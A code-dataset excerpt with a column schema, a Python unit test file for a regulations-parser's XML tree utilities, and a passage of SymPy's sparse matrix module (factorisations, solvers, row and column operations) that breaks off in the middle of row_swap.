repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
grapesmoker/regulations-parser | tests/tree_utils_tests.py | 3 | 4264 | # vim: set encoding=utf-8
import unittest
from lxml import etree
from regparser.tree.struct import Node
from regparser.tree.xml_parser import tree_utils
class TreeUtilsTest(unittest.TestCase):
def test_split_text(self):
text = "(A) Apples (B) Bananas (Z) Zebras"
tokens = ['(A)', '(B)']
result = tree_utils.split_text(text, tokens)
expected = ['(A) Apples ', '(B) Bananas (Z) Zebras']
self.assertEqual(expected, result)
def test_consecutive_markers(self):
text = "(A)(2) Bananas"
tokens = ['(A)', '(2)']
result = tree_utils.split_text(text, tokens)
expected = ['(A)', '(2) Bananas']
self.assertEqual(expected, result)
def test_get_paragraph_marker(self):
text = '(k)(2)(iii) abc (j)'
result = [m for m in tree_utils.get_paragraph_markers(text)]
self.assertEqual(['k', '2', 'iii'], result)
text = '(i)(A) The minimum period payment'
result = [m for m in tree_utils.get_paragraph_markers(text)]
self.assertEqual(['i', 'A'], result)
def test_get_node_text_tags(self):
text = '<P>(a)<E T="03">Fruit.</E>Apples,<PRTPAGE P="102"/> and '
text += 'Pineapples</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text_tags_preserved(doc)
self.assertEquals(
'(a)<E T="03">Fruit.</E>Apples, and Pineapples', result)
def test_no_tags(self):
text = '<P>(a) Fruit. Apples, and Pineapples</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text_tags_preserved(doc)
self.assertEqual('(a) Fruit. Apples, and Pineapples', result)
def test_get_node_text(self):
text = '<P>(a)<E T="03">Fruit.</E>Apps,<PRTPAGE P="102"/> and pins</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text(doc)
self.assertEquals('(a)Fruit.Apps, and pins', result)
text = '<P>(a)<E T="03">Fruit.</E>Apps,<PRTPAGE P="102"/> and pins</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text(doc, add_spaces=True)
self.assertEquals('(a) Fruit. Apps, and pins', result)
text = '<P>(a) <E T="03">Fruit.</E> Apps, and pins</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text(doc, add_spaces=True)
self.assertEquals('(a) Fruit. Apps, and pins', result)
text = '<P>(a) ABC<E T="52">123</E>= 5</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text(doc, add_spaces=True)
self.assertEquals('(a) ABC_{123} = 5', result)
text = '<P>(a) <E>Keyterm.</E> ABC<E T="52">123</E>= 5</P>'
doc = etree.fromstring(text)
result = tree_utils.get_node_text(doc, add_spaces=True)
self.assertEquals('(a) Keyterm. ABC_{123} = 5', result)
def test_unwind_stack(self):
level_one_n = Node(label=['272'])
level_two_n = Node(label=['a'])
m_stack = tree_utils.NodeStack()
m_stack.push_last((1, level_one_n))
m_stack.add(2, level_two_n)
self.assertEquals(m_stack.size(), 2)
m_stack.unwind()
self.assertEquals(m_stack.size(), 1)
n = m_stack.pop()[0][1]
self.assertEqual(n.children[0].label, ['272', 'a'])
def test_get_collapsed_markers(self):
text = u'(a) <E T="03">Transfer </E>—(1) <E T="03">Notice.</E> follow'
markers = tree_utils.get_collapsed_markers(text)
self.assertEqual(markers, [u'1'])
text = '(1) See paragraph (a) for more'
self.assertEqual([], tree_utils.get_collapsed_markers(text))
text = '(a) (1) More content'
self.assertEqual([], tree_utils.get_collapsed_markers(text))
text = u'(a) <E T="03">Transfer—</E>(1) <E T="03">Notice.</E> follow'
self.assertEqual([u'1'], tree_utils.get_collapsed_markers(text))
text = u'(a) <E T="03">Keyterm</E>—(1)(i) Content'
self.assertEqual(['1', 'i'], tree_utils.get_collapsed_markers(text))
text = "(C) The information required by paragraphs (a)(2), "
text += "(a)(4)(iii), (a)(5), (b) through (d), (i), (l) through (p)"
self.assertEqual([], tree_utils.get_collapsed_markers(text))
| cc0-1.0 | -4,419,260,421,148,290,000 | 36.026087 | 79 | 0.575388 | false |
dennisss/sympy | sympy/matrices/sparse.py | 4 | 43652 | from __future__ import print_function, division
import copy
from collections import defaultdict
from sympy.core.containers import Dict
from sympy.core.compatibility import is_sequence, as_int
from sympy.core.singleton import S
from sympy.functions.elementary.miscellaneous import sqrt
from sympy.utilities.iterables import uniq
from sympy.utilities.exceptions import SymPyDeprecationWarning
from .matrices import MatrixBase, ShapeError, a2idx
from .dense import Matrix
import collections
class SparseMatrix(MatrixBase):
"""
A sparse matrix (a matrix with a large number of zero elements).
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> SparseMatrix(2, 2, range(4))
Matrix([
[0, 1],
[2, 3]])
>>> SparseMatrix(2, 2, {(1, 1): 2})
Matrix([
[0, 0],
[0, 2]])
See Also
========
sympy.matrices.dense.Matrix
"""
def __init__(self, *args):
if len(args) == 1 and isinstance(args[0], SparseMatrix):
self.rows = args[0].rows
self.cols = args[0].cols
self._smat = dict(args[0]._smat)
return
self._smat = {}
if len(args) == 3:
self.rows = as_int(args[0])
self.cols = as_int(args[1])
if isinstance(args[2], collections.Callable):
op = args[2]
for i in range(self.rows):
for j in range(self.cols):
value = self._sympify(op(i, j))
if value:
self._smat[(i, j)] = value
elif isinstance(args[2], (dict, Dict)):
# manual copy, copy.deepcopy() doesn't work
for key in args[2].keys():
v = args[2][key]
if v:
self._smat[key] = v
elif is_sequence(args[2]):
if len(args[2]) != self.rows*self.cols:
raise ValueError(
'List length (%s) != rows*columns (%s)' %
(len(args[2]), self.rows*self.cols))
flat_list = args[2]
for i in range(self.rows):
for j in range(self.cols):
value = self._sympify(flat_list[i*self.cols + j])
if value:
self._smat[(i, j)] = value
else:
# handle full matrix forms with _handle_creation_inputs
r, c, _list = Matrix._handle_creation_inputs(*args)
self.rows = r
self.cols = c
for i in range(self.rows):
for j in range(self.cols):
value = _list[self.cols*i + j]
if value:
self._smat[(i, j)] = value
def __getitem__(self, key):
if isinstance(key, tuple):
i, j = key
try:
i, j = self.key2ij(key)
return self._smat.get((i, j), S.Zero)
except (TypeError, IndexError):
if isinstance(i, slice):
i = range(self.rows)[i]
elif is_sequence(i):
pass
else:
if i >= self.rows:
raise IndexError('Row index out of bounds')
i = [i]
if isinstance(j, slice):
j = range(self.cols)[j]
elif is_sequence(j):
pass
else:
if j >= self.cols:
raise IndexError('Col index out of bounds')
j = [j]
return self.extract(i, j)
# check for single arg, like M[:] or M[3]
if isinstance(key, slice):
lo, hi = key.indices(len(self))[:2]
L = []
for i in range(lo, hi):
m, n = divmod(i, self.cols)
L.append(self._smat.get((m, n), S.Zero))
return L
i, j = divmod(a2idx(key, len(self)), self.cols)
return self._smat.get((i, j), S.Zero)
def __setitem__(self, key, value):
raise NotImplementedError()
def copy(self):
return self._new(self.rows, self.cols, self._smat)
@property
def is_Identity(self):
if not self.is_square:
return False
if not all(self[i, i] == 1 for i in range(self.rows)):
return False
return len(self) == self.rows
def tolist(self):
"""Convert this sparse matrix into a list of nested Python lists.
Examples
========
>>> from sympy.matrices import SparseMatrix, ones
>>> a = SparseMatrix(((1, 2), (3, 4)))
>>> a.tolist()
[[1, 2], [3, 4]]
When there are no rows then it will not be possible to tell how
many columns were in the original matrix:
>>> SparseMatrix(ones(0, 3)).tolist()
[]
"""
if not self.rows:
return []
if not self.cols:
return [[] for i in range(self.rows)]
I, J = self.shape
return [[self[i, j] for j in range(J)] for i in range(I)]
def row(self, i):
"""Returns column i from self as a row vector.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> a = SparseMatrix(((1, 2), (3, 4)))
>>> a.row(0)
Matrix([[1, 2]])
See Also
========
col
row_list
"""
return self[i,:]
def col(self, j):
"""Returns column j from self as a column vector.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> a = SparseMatrix(((1, 2), (3, 4)))
>>> a.col(0)
Matrix([
[1],
[3]])
See Also
========
row
col_list
"""
return self[:, j]
def row_list(self):
"""Returns a row-sorted list of non-zero elements of the matrix.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> a = SparseMatrix(((1, 2), (3, 4)))
>>> a
Matrix([
[1, 2],
[3, 4]])
>>> a.RL
[(0, 0, 1), (0, 1, 2), (1, 0, 3), (1, 1, 4)]
See Also
========
row_op
col_list
"""
return [tuple(k + (self[k],)) for k in sorted(list(self._smat.keys()), key=lambda k: list(k))]
RL = property(row_list, None, None, "Alternate faster representation")
def col_list(self):
"""Returns a column-sorted list of non-zero elements of the matrix.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> a=SparseMatrix(((1, 2), (3, 4)))
>>> a
Matrix([
[1, 2],
[3, 4]])
>>> a.CL
[(0, 0, 1), (1, 0, 3), (0, 1, 2), (1, 1, 4)]
See Also
========
col_op
row_list
"""
return [tuple(k + (self[k],)) for k in sorted(list(self._smat.keys()), key=lambda k: list(reversed(k)))]
CL = property(col_list, None, None, "Alternate faster representation")
def _eval_trace(self):
"""Calculate the trace of a square matrix.
Examples
========
>>> from sympy.matrices import eye
>>> eye(3).trace()
3
"""
trace = S.Zero
for i in range(self.cols):
trace += self._smat.get((i, i), 0)
return trace
def _eval_transpose(self):
"""Returns the transposed SparseMatrix of this SparseMatrix.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> a = SparseMatrix(((1, 2), (3, 4)))
>>> a
Matrix([
[1, 2],
[3, 4]])
>>> a.T
Matrix([
[1, 3],
[2, 4]])
"""
tran = self.zeros(self.cols, self.rows)
for key, value in self._smat.items():
key = key[1], key[0] # reverse
tran._smat[key] = value
return tran
def _eval_conjugate(self):
"""Return the by-element conjugation.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> from sympy import I
>>> a = SparseMatrix(((1, 2 + I), (3, 4), (I, -I)))
>>> a
Matrix([
[1, 2 + I],
[3, 4],
[I, -I]])
>>> a.C
Matrix([
[ 1, 2 - I],
[ 3, 4],
[-I, I]])
See Also
========
transpose: Matrix transposition
H: Hermite conjugation
D: Dirac conjugation
"""
conj = self.copy()
for key, value in self._smat.items():
conj._smat[key] = value.conjugate()
return conj
def multiply(self, other):
"""Fast multiplication exploiting the sparsity of the matrix.
Examples
========
>>> from sympy.matrices import SparseMatrix, ones
>>> A, B = SparseMatrix(ones(4, 3)), SparseMatrix(ones(3, 4))
>>> A.multiply(B) == 3*ones(4)
True
See Also
========
add
"""
A = self
B = other
# sort B's row_list into list of rows
Blist = [[] for i in range(B.rows)]
for i, j, v in B.row_list():
Blist[i].append((j, v))
Cdict = defaultdict(int)
for k, j, Akj in A.row_list():
for n, Bjn in Blist[j]:
temp = Akj*Bjn
Cdict[k, n] += temp
rv = self.zeros(A.rows, B.cols)
rv._smat = dict([(k, v) for k, v in Cdict.items() if v])
return rv
def scalar_multiply(self, scalar):
"Scalar element-wise multiplication"
M = self.zeros(*self.shape)
if scalar:
for i in self._smat:
v = scalar*self._smat[i]
if v:
M._smat[i] = v
else:
M._smat.pop(i, None)
return M
def __mul__(self, other):
"""Multiply self and other, watching for non-matrix entities.
When multiplying be a non-sparse matrix, the result is no longer
sparse.
Examples
========
>>> from sympy.matrices import SparseMatrix, eye, zeros
>>> I = SparseMatrix(eye(3))
>>> I*I == I
True
>>> Z = zeros(3)
>>> I*Z
Matrix([
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]])
>>> I*2 == 2*I
True
"""
if isinstance(other, SparseMatrix):
return self.multiply(other)
if isinstance(other, MatrixBase):
return other._new(self*self._new(other))
return self.scalar_multiply(other)
def __rmul__(self, other):
"""Return product the same type as other (if a Matrix).
When multiplying be a non-sparse matrix, the result is no longer
sparse.
Examples
========
>>> from sympy.matrices import Matrix, SparseMatrix
>>> A = Matrix(2, 2, range(1, 5))
>>> S = SparseMatrix(2, 2, range(2, 6))
>>> A*S == S*A
False
>>> (isinstance(A*S, SparseMatrix) ==
... isinstance(S*A, SparseMatrix) == False)
True
"""
if isinstance(other, MatrixBase):
return other*other._new(self)
return self.scalar_multiply(other)
def __add__(self, other):
"""Add other to self, efficiently if possible.
When adding a non-sparse matrix, the result is no longer
sparse.
Examples
========
>>> from sympy.matrices import SparseMatrix, eye
>>> A = SparseMatrix(eye(3)) + SparseMatrix(eye(3))
>>> B = SparseMatrix(eye(3)) + eye(3)
>>> A
Matrix([
[2, 0, 0],
[0, 2, 0],
[0, 0, 2]])
>>> A == B
True
>>> isinstance(A, SparseMatrix) and isinstance(B, SparseMatrix)
False
"""
if isinstance(other, SparseMatrix):
return self.add(other)
elif isinstance(other, MatrixBase):
return other._new(other + self)
else:
raise NotImplementedError(
"Cannot add %s to %s" %
tuple([c.__class__.__name__ for c in (other, self)]))
def __neg__(self):
"""Negate all elements of self.
Examples
========
>>> from sympy.matrices import SparseMatrix, eye
>>> -SparseMatrix(eye(3))
Matrix([
[-1, 0, 0],
[ 0, -1, 0],
[ 0, 0, -1]])
"""
rv = self.copy()
for k, v in rv._smat.items():
rv._smat[k] = -v
return rv
def add(self, other):
"""Add two sparse matrices with dictionary representation.
Examples
========
>>> from sympy.matrices import SparseMatrix, eye, ones
>>> SparseMatrix(eye(3)).add(SparseMatrix(ones(3)))
Matrix([
[2, 1, 1],
[1, 2, 1],
[1, 1, 2]])
>>> SparseMatrix(eye(3)).add(-SparseMatrix(eye(3)))
Matrix([
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]])
Only the non-zero elements are stored, so the resulting dictionary
that is used to represent the sparse matrix is empty:
>>> _._smat
{}
See Also
========
multiply
"""
if not isinstance(other, SparseMatrix):
raise ValueError('only use add with %s, not %s' %
tuple([c.__class__.__name__ for c in (self, other)]))
if self.shape != other.shape:
raise ShapeError()
M = self.copy()
for i, v in other._smat.items():
v = M[i] + v
if v:
M._smat[i] = v
else:
M._smat.pop(i, None)
return M
def extract(self, rowsList, colsList):
urow = list(uniq(rowsList))
ucol = list(uniq(colsList))
smat = {}
if len(urow)*len(ucol) < len(self._smat):
# there are fewer elements requested than there are elements in the matrix
for i, r in enumerate(urow):
for j, c in enumerate(ucol):
smat[i, j] = self._smat.get((r, c), 0)
else:
# most of the request will be zeros so check all of self's entries,
# keeping only the ones that are desired
for rk, ck in self._smat:
if rk in urow and ck in ucol:
smat[(urow.index(rk), ucol.index(ck))] = self._smat[(rk, ck)]
rv = self._new(len(urow), len(ucol), smat)
# rv is nominally correct but there might be rows/cols
# which require duplication
if len(rowsList) != len(urow):
for i, r in enumerate(rowsList):
i_previous = rowsList.index(r)
if i_previous != i:
rv = rv.row_insert(i, rv.row(i_previous))
if len(colsList) != len(ucol):
for i, c in enumerate(colsList):
i_previous = colsList.index(c)
if i_previous != i:
rv = rv.col_insert(i, rv.col(i_previous))
return rv
extract.__doc__ = MatrixBase.extract.__doc__
def is_symmetric(self, simplify=True):
"""Return True if self is symmetric.
Examples
========
>>> from sympy.matrices import SparseMatrix, eye
>>> M = SparseMatrix(eye(3))
>>> M.is_symmetric()
True
>>> M[0, 2] = 1
>>> M.is_symmetric()
False
"""
if simplify:
return all((k[1], k[0]) in self._smat and
not (self[k] - self[(k[1], k[0])]).simplify()
for k in self._smat)
else:
return all((k[1], k[0]) in self._smat and
self[k] == self[(k[1], k[0])] for k in self._smat)
def has(self, *patterns):
"""Test whether any subexpression matches any of the patterns.
Examples
========
>>> from sympy import SparseMatrix, Float
>>> from sympy.abc import x, y
>>> A = SparseMatrix(((1, x), (0.2, 3)))
>>> A.has(x)
True
>>> A.has(y)
False
>>> A.has(Float)
True
"""
return any(self[key].has(*patterns) for key in self._smat)
def applyfunc(self, f):
"""Apply a function to each element of the matrix.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> m = SparseMatrix(2, 2, lambda i, j: i*2+j)
>>> m
Matrix([
[0, 1],
[2, 3]])
>>> m.applyfunc(lambda i: 2*i)
Matrix([
[0, 2],
[4, 6]])
"""
if not callable(f):
raise TypeError("`f` must be callable.")
out = self.copy()
for k, v in self._smat.items():
fv = f(v)
if fv:
out._smat[k] = fv
else:
out._smat.pop(k, None)
return out
def reshape(self, rows, cols):
"""Reshape matrix while retaining original size.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> S = SparseMatrix(4, 2, range(8))
>>> S.reshape(2, 4)
Matrix([
[0, 1, 2, 3],
[4, 5, 6, 7]])
"""
if len(self) != rows*cols:
raise ValueError("Invalid reshape parameters %d %d" % (rows, cols))
smat = {}
for k, v in self._smat.items():
i, j = k
n = i*self.cols + j
ii, jj = divmod(n, cols)
smat[(ii, jj)] = self._smat[(i, j)]
return self._new(rows, cols, smat)
def liupc(self):
"""Liu's algorithm, for pre-determination of the Elimination Tree of
the given matrix, used in row-based symbolic Cholesky factorization.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> S = SparseMatrix([
... [1, 0, 3, 2],
... [0, 0, 1, 0],
... [4, 0, 0, 5],
... [0, 6, 7, 0]])
>>> S.liupc()
([[0], [], [0], [1, 2]], [4, 3, 4, 4])
References
==========
Symbolic Sparse Cholesky Factorization using Elimination Trees,
Jeroen Van Grondelle (1999)
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.39.7582
"""
# Algorithm 2.4, p 17 of reference
# get the indices of the elements that are non-zero on or below diag
R = [[] for r in range(self.rows)]
for r, c, _ in self.row_list():
if c <= r:
R[r].append(c)
inf = len(R) # nothing will be this large
parent = [inf]*self.rows
virtual = [inf]*self.rows
for r in range(self.rows):
for c in R[r][:-1]:
while virtual[c] < r:
t = virtual[c]
virtual[c] = r
c = t
if virtual[c] == inf:
parent[c] = virtual[c] = r
return R, parent
def row_structure_symbolic_cholesky(self):
"""Symbolic cholesky factorization, for pre-determination of the
non-zero structure of the Cholesky factororization.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> S = SparseMatrix([
... [1, 0, 3, 2],
... [0, 0, 1, 0],
... [4, 0, 0, 5],
... [0, 6, 7, 0]])
>>> S.row_structure_symbolic_cholesky()
[[0], [], [0], [1, 2]]
References
==========
Symbolic Sparse Cholesky Factorization using Elimination Trees,
Jeroen Van Grondelle (1999)
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.39.7582
"""
R, parent = self.liupc()
inf = len(R) # this acts as infinity
Lrow = copy.deepcopy(R)
for k in range(self.rows):
for j in R[k]:
while j != inf and j != k:
Lrow[k].append(j)
j = parent[j]
Lrow[k] = list(sorted(set(Lrow[k])))
return Lrow
def _cholesky_sparse(self):
"""Algorithm for numeric Cholesky factorization of a sparse matrix."""
Crowstruc = self.row_structure_symbolic_cholesky()
C = self.zeros(self.rows)
for i in range(len(Crowstruc)):
for j in Crowstruc[i]:
if i != j:
C[i, j] = self[i, j]
summ = 0
for p1 in Crowstruc[i]:
if p1 < j:
for p2 in Crowstruc[j]:
if p2 < j:
if p1 == p2:
summ += C[i, p1]*C[j, p1]
else:
break
else:
break
C[i, j] -= summ
C[i, j] /= C[j, j]
else:
C[j, j] = self[j, j]
summ = 0
for k in Crowstruc[j]:
if k < j:
summ += C[j, k]**2
else:
break
C[j, j] -= summ
C[j, j] = sqrt(C[j, j])
return C
def _LDL_sparse(self):
"""Algorithm for numeric LDL factization, exploiting sparse structure.
"""
Lrowstruc = self.row_structure_symbolic_cholesky()
L = self.eye(self.rows)
D = self.zeros(self.rows, self.cols)
for i in range(len(Lrowstruc)):
for j in Lrowstruc[i]:
if i != j:
L[i, j] = self[i, j]
summ = 0
for p1 in Lrowstruc[i]:
if p1 < j:
for p2 in Lrowstruc[j]:
if p2 < j:
if p1 == p2:
summ += L[i, p1]*L[j, p1]*D[p1, p1]
else:
break
else:
break
L[i, j] -= summ
L[i, j] /= D[j, j]
elif i == j:
D[i, i] = self[i, i]
summ = 0
for k in Lrowstruc[i]:
if k < i:
summ += L[i, k]**2*D[k, k]
else:
break
D[i, i] -= summ
return L, D
def _lower_triangular_solve(self, rhs):
"""Fast algorithm for solving a lower-triangular system,
exploiting the sparsity of the given matrix.
"""
rows = [[] for i in range(self.rows)]
for i, j, v in self.row_list():
if i > j:
rows[i].append((j, v))
X = rhs.copy()
for i in range(self.rows):
for j, v in rows[i]:
X[i, 0] -= v*X[j, 0]
X[i, 0] /= self[i, i]
return self._new(X)
def _upper_triangular_solve(self, rhs):
"""Fast algorithm for solving an upper-triangular system,
exploiting the sparsity of the given matrix.
"""
rows = [[] for i in range(self.rows)]
for i, j, v in self.row_list():
if i < j:
rows[i].append((j, v))
X = rhs.copy()
for i in range(self.rows - 1, -1, -1):
rows[i].reverse()
for j, v in rows[i]:
X[i, 0] -= v*X[j, 0]
X[i, 0] /= self[i, i]
return self._new(X)
def _diagonal_solve(self, rhs):
"Diagonal solve."
return self._new(self.rows, 1, lambda i, j: rhs[i, 0] / self[i, i])
def _cholesky_solve(self, rhs):
# for speed reasons, this is not uncommented, but if you are
# having difficulties, try uncommenting to make sure that the
# input matrix is symmetric
#assert self.is_symmetric()
L = self._cholesky_sparse()
Y = L._lower_triangular_solve(rhs)
rv = L.T._upper_triangular_solve(Y)
return rv
def _LDL_solve(self, rhs):
# for speed reasons, this is not uncommented, but if you are
# having difficulties, try uncommenting to make sure that the
# input matrix is symmetric
#assert self.is_symmetric()
L, D = self._LDL_sparse()
Z = L._lower_triangular_solve(rhs)
Y = D._diagonal_solve(Z)
return L.T._upper_triangular_solve(Y)
def cholesky(self):
"""
Returns the Cholesky decomposition L of a matrix A
such that L * L.T = A
A must be a square, symmetric, positive-definite
and non-singular matrix
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> A = SparseMatrix(((25,15,-5),(15,18,0),(-5,0,11)))
>>> A.cholesky()
Matrix([
[ 5, 0, 0],
[ 3, 3, 0],
[-1, 1, 3]])
>>> A.cholesky() * A.cholesky().T == A
True
"""
from sympy.core.numbers import nan, oo
if not self.is_symmetric():
raise ValueError('Cholesky decomposition applies only to '
'symmetric matrices.')
M = self.as_mutable()._cholesky_sparse()
if M.has(nan) or M.has(oo):
raise ValueError('Cholesky decomposition applies only to '
'positive-definite matrices')
return self._new(M)
def LDLdecomposition(self):
"""
Returns the LDL Decomposition (matrices ``L`` and ``D``) of matrix
``A``, such that ``L * D * L.T == A``. ``A`` must be a square,
symmetric, positive-definite and non-singular.
This method eliminates the use of square root and ensures that all
the diagonal entries of L are 1.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> A = SparseMatrix(((25, 15, -5), (15, 18, 0), (-5, 0, 11)))
>>> L, D = A.LDLdecomposition()
>>> L
Matrix([
[ 1, 0, 0],
[ 3/5, 1, 0],
[-1/5, 1/3, 1]])
>>> D
Matrix([
[25, 0, 0],
[ 0, 9, 0],
[ 0, 0, 9]])
>>> L * D * L.T == A
True
"""
from sympy.core.numbers import nan, oo
if not self.is_symmetric():
raise ValueError('LDL decomposition applies only to '
'symmetric matrices.')
L, D = self.as_mutable()._LDL_sparse()
if L.has(nan) or L.has(oo) or D.has(nan) or D.has(oo):
raise ValueError('LDL decomposition applies only to '
'positive-definite matrices')
return self._new(L), self._new(D)
def solve_least_squares(self, rhs, method='LDL'):
"""Return the least-square fit to the data.
By default the cholesky_solve routine is used (method='CH'); other
methods of matrix inversion can be used. To find out which are
available, see the docstring of the .inv() method.
Examples
========
>>> from sympy.matrices import SparseMatrix, Matrix, ones
>>> A = Matrix([1, 2, 3])
>>> B = Matrix([2, 3, 4])
>>> S = SparseMatrix(A.row_join(B))
>>> S
Matrix([
[1, 2],
[2, 3],
[3, 4]])
If each line of S represent coefficients of Ax + By
and x and y are [2, 3] then S*xy is:
>>> r = S*Matrix([2, 3]); r
Matrix([
[ 8],
[13],
[18]])
But let's add 1 to the middle value and then solve for the
least-squares value of xy:
>>> xy = S.solve_least_squares(Matrix([8, 14, 18])); xy
Matrix([
[ 5/3],
[10/3]])
The error is given by S*xy - r:
>>> S*xy - r
Matrix([
[1/3],
[1/3],
[1/3]])
>>> _.norm().n(2)
0.58
If a different xy is used, the norm will be higher:
>>> xy += ones(2, 1)/10
>>> (S*xy - r).norm().n(2)
1.5
"""
t = self.T
return (t*self).inv(method=method)*t*rhs
def solve(self, rhs, method='LDL'):
"""Return solution to self*soln = rhs using given inversion method.
For a list of possible inversion methods, see the .inv() docstring.
"""
if not self.is_square:
if self.rows < self.cols:
raise ValueError('Under-determined system.')
elif self.rows > self.cols:
raise ValueError('For over-determined system, M, having '
'more rows than columns, try M.solve_least_squares(rhs).')
else:
return self.inv(method=method)*rhs
def _eval_inverse(self, **kwargs):
"""Return the matrix inverse using Cholesky or LDL (default)
decomposition as selected with the ``method`` keyword: 'CH' or 'LDL',
respectively.
Examples
========
>>> from sympy import SparseMatrix, Matrix
>>> A = SparseMatrix([
... [ 2, -1, 0],
... [-1, 2, -1],
... [ 0, 0, 2]])
>>> A.inv('CH')
Matrix([
[2/3, 1/3, 1/6],
[1/3, 2/3, 1/3],
[ 0, 0, 1/2]])
>>> A.inv(method='LDL') # use of 'method=' is optional
Matrix([
[2/3, 1/3, 1/6],
[1/3, 2/3, 1/3],
[ 0, 0, 1/2]])
>>> A * _
Matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
"""
sym = self.is_symmetric()
M = self.as_mutable()
I = M.eye(M.rows)
if not sym:
t = M.T
r1 = M[0, :]
M = t*M
I = t*I
method = kwargs.get('method', 'LDL')
if method in "LDL":
solve = M._LDL_solve
elif method == "CH":
solve = M._cholesky_solve
else:
raise NotImplementedError(
'Method may be "CH" or "LDL", not %s.' % method)
rv = M.hstack(*[solve(I[:, i]) for i in range(I.cols)])
if not sym:
scale = (r1*rv[:, 0])[0, 0]
rv /= scale
return self._new(rv)
def __eq__(self, other):
try:
if self.shape != other.shape:
return False
if isinstance(other, SparseMatrix):
return self._smat == other._smat
elif isinstance(other, MatrixBase):
return self._smat == MutableSparseMatrix(other)._smat
except AttributeError:
return False
def __ne__(self, other):
return not self == other
def as_mutable(self):
"""Returns a mutable version of this matrix.
Examples
========
>>> from sympy import ImmutableMatrix
>>> X = ImmutableMatrix([[1, 2], [3, 4]])
>>> Y = X.as_mutable()
>>> Y[1, 1] = 5 # Can set values in Y
>>> Y
Matrix([
[1, 2],
[3, 5]])
"""
return MutableSparseMatrix(self)
def as_immutable(self):
"""Returns an Immutable version of this Matrix."""
from immutable import ImmutableSparseMatrix
return ImmutableSparseMatrix(self)
def nnz(self):
"""Returns the number of non-zero elements in Matrix."""
return len(self._smat)
@classmethod
def zeros(cls, r, c=None):
"""Return an r x c matrix of zeros, square if c is omitted."""
c = r if c is None else c
r = as_int(r)
c = as_int(c)
return cls(r, c, {})
@classmethod
def eye(cls, n):
"""Return an n x n identity matrix."""
n = as_int(n)
return cls(n, n, dict([((i, i), S.One) for i in range(n)]))
class MutableSparseMatrix(SparseMatrix, MatrixBase):
@classmethod
def _new(cls, *args, **kwargs):
return cls(*args)
def as_mutable(self):
return self.copy()
def __setitem__(self, key, value):
"""Assign value to position designated by key.
Examples
========
>>> from sympy.matrices import SparseMatrix, ones
>>> M = SparseMatrix(2, 2, {})
>>> M[1] = 1; M
Matrix([
[0, 1],
[0, 0]])
>>> M[1, 1] = 2; M
Matrix([
[0, 1],
[0, 2]])
>>> M = SparseMatrix(2, 2, {})
>>> M[:, 1] = [1, 1]; M
Matrix([
[0, 1],
[0, 1]])
>>> M = SparseMatrix(2, 2, {})
>>> M[1, :] = [[1, 1]]; M
Matrix([
[0, 0],
[1, 1]])
To replace row r you assign to position r*m where m
is the number of columns:
>>> M = SparseMatrix(4, 4, {})
>>> m = M.cols
>>> M[3*m] = ones(1, m)*2; M
Matrix([
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0],
[2, 2, 2, 2]])
And to replace column c you can assign to position c:
>>> M[2] = ones(m, 1)*4; M
Matrix([
[0, 0, 4, 0],
[0, 0, 4, 0],
[0, 0, 4, 0],
[2, 2, 4, 2]])
"""
rv = self._setitem(key, value)
if rv is not None:
i, j, value = rv
if value:
self._smat[(i, j)] = value
elif (i, j) in self._smat:
del self._smat[(i, j)]
__hash__ = None
def row_del(self, k):
"""Delete the given row of the matrix.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> M = SparseMatrix([[0, 0], [0, 1]])
>>> M
Matrix([
[0, 0],
[0, 1]])
>>> M.row_del(0)
>>> M
Matrix([[0, 1]])
See Also
========
col_del
"""
newD = {}
k = a2idx(k, self.rows)
for (i, j) in self._smat:
if i == k:
pass
elif i > k:
newD[i - 1, j] = self._smat[i, j]
else:
newD[i, j] = self._smat[i, j]
self._smat = newD
self.rows -= 1
def col_del(self, k):
"""Delete the given column of the matrix.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> M = SparseMatrix([[0, 0], [0, 1]])
>>> M
Matrix([
[0, 0],
[0, 1]])
>>> M.col_del(0)
>>> M
Matrix([
[0],
[1]])
See Also
========
row_del
"""
newD = {}
k = a2idx(k, self.cols)
for (i, j) in self._smat:
if j == k:
pass
elif j > k:
newD[i, j - 1] = self._smat[i, j]
else:
newD[i, j] = self._smat[i, j]
self._smat = newD
self.cols -= 1
def row_swap(self, i, j):
"""Swap, in place, columns i and j.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> S = SparseMatrix.eye(3); S[2, 1] = 2
>>> S.row_swap(1, 0); S
Matrix([
[0, 1, 0],
[1, 0, 0],
[0, 2, 1]])
"""
if i > j:
i, j = j, i
rows = self.row_list()
temp = []
for ii, jj, v in rows:
if ii == i:
self._smat.pop((ii, jj))
temp.append((jj, v))
elif ii == j:
self._smat.pop((ii, jj))
self._smat[i, jj] = v
elif ii > j:
break
for k, v in temp:
self._smat[j, k] = v
